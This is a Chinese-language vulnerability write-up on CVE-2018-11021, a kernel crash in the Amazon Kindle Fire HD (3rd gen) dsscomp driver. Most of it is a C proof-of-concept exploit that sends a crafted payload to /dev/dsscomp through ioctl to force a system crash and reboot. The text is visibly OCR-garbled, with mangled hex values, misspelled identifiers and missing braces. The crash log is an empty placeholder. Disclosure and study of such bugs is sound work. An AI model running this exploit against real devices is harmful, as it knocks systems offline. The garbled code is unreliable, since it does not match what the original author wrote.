(CVE-2018-11021)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx
(CVE-2018-11021) Amazon Kindle Fire HD (3rd) Fire OS kernel 组件安全漏洞一、漏洞简介Amazon Kindle Fire HD (3rd) Fire OS 4.5.5.3 内核组件中的内核模块 omapdriversvideoomap2dsscompdevice.c 允许攻击者通过设备/ dev 上 ioctl 的参数注入特制参数/dsscomp与命令1118064517并导致内核崩溃。要探索此漏洞,必须打开设备文件/ dev/dsscomp,并使用命令Ill8064517和 精心设计的有效负载作为第三个参数在此设备文件上调用ioctl系统调用。二、漏洞影响Fire OS 4.5.5.3三、复现过程poc /* This is poc of Kindle Fire HD 3rd* A bug in the ioctl interface of device file devdsscomp causes the system crash via IOCTL 1118064517.* Related buggy struct name is dsscomp_setup_dispc_data.* This Poc should run with permission to do ioctl on devdsscomp.*/#include <stdio.h>#include <fcntl.h> ttinclude <errno.h> #include <sysioctl.h>const static char *driver = ,devdsscomp"static command = 1118064517;int main(int argc, char *argv, char *env) unsigned int payload = 0xffffffff, 0X00000003j 0×5d200040, 0×79900008j 0x8f5928bd, 0x78b02422j 0X000000004 Oxffffffff, 0×f4c50400,0x007fffff, 0x8499f562, 0×ffff0400, 0×001bl31dj 0×60818210, 0x00000007, 0×ffffffff, 0x00000000, 0x9da9041c 0xcd980400, 0x001f03f4, 0X00000007, 0x2a34003f, 0x7c80d8f3j 0x63102627, 0×c73643a8, 0xa28f0665, 0X00000000, 0x689e57b4, 0x01ff0008, 0x5e7324bl, 0×ae3b003f, 0×0bl74d86, 0x00000400, 0x2:Iffff37, 0×ceb367a4j 0X00000040, 0X00000001, 0xec000f9e, 0x00000001j 0×000001ff, 0X00000000, 0×00000000, 0X0000000f, 0x0425c069, 0×038cc3bej 0×0000000f, 0×00000080, 0×e5790100, 0x5blbffffj 0x0000d355, 0x0000c685, 0xa0070000, 0×0010ffff, 0×00a0ff00, 0X00000001j 0ff490700, 0×0832ad03j 0×00000006, 0×00000002, 0X00000001 0×81f871c0, 0×738019cb, 0×bf47ffff, 0X00000040j 0X00000001, 0x7fl90f33, 0X00000001, 0x8295769b, 0x0000003fj 0x869f2295, Oxffffffff, 0xd673914f, 0x05055800, 0xed69b7d5, 0×00000000j 0×0107ebbdj 0xd214af8d, 0xffff4a93j 0x26450008, 0x58df0000, 0×dl6db084, 0×03ff30ddj 0x00000001, 0x209aff3b, 0xe7850800, 0X00000002, 0x30da815cj 0x426f5105, 0x0del09d7, 0×2cla65fcj 0xfcb3d75f, 0X00000000, 0×00000001, 0×8066be5b, 0X00000002, 0ffffffff, 0x5cf232ec, 0×680dl469j 0X00000001j 0X00000020, 0xffffffff, 0X00000400, 0xdldl2be8j 0X02010200, 0x01ffcl6f, 0xf6e237e6j 0x007f0000j 0x0Iff08f8, 0×000f00f9, 0×bad07695, 0x00000000, 0xbaff0000, 0x24040040j 0x00000006j 0X00000004, 0x00000000, 0×bc2e9242j 0×009f5f08, 0X00800000, 0X00000000, 0x00000001, 0xff8800ff, 0X00000001, 0×00000000j 0X000003f4, 0x6faa8472j 0x00000400, 0xec857dd5, 0x00000000j 0X00000040, 0×ffffffff, 0×3f004874, 0x0000b77a, 0×ec9acb95j 0×facc0001j 0xffff0001j 0×0080ffffj 0x3600ff03, 0X00000001, 0×8fff7d7f, 0×6b87075a, 0x00000000, 0x41414141j 0×41414141j 0x41414141j 0x41414141, 0X00100Iff, 0×00000000j 0X00000001, 0xfflf0512j 0x00000001, 0x51e32167, 0xcl8c55ccj 0x00000000, Oxffffffff, 0xb4aafl2b ×86edfdbdj 0x00000010, 0x0000003f,0xabff7b00j0xffff9ea3j0×b28e0040,0×000fffff,0x458603f4,0×ffff007f,0×a9030f02j0×00000001j0x002Cffff,0x9e00cdffj0x00000004j0x41414141,0x41414141,0×41414141,0x41414141 ;int fd = 0;fd = OPen(driver, 0_RDWR);if (fd < 0) printf("Failed to open %sj with errno %dn, driver, errno);system("echo 1 > datalocaltmplog");return -1;printf("Try open %s with command 0x%×.n", driver, command);printf("System will crash and reboot.n");if(ioctl(fd, command, payload) < 0) printf("Allocation of structs failed, %dn, errno);system("echo 2 > datalocaltmplog");return -1;close(fd);return 0;)崩溃日志To be added here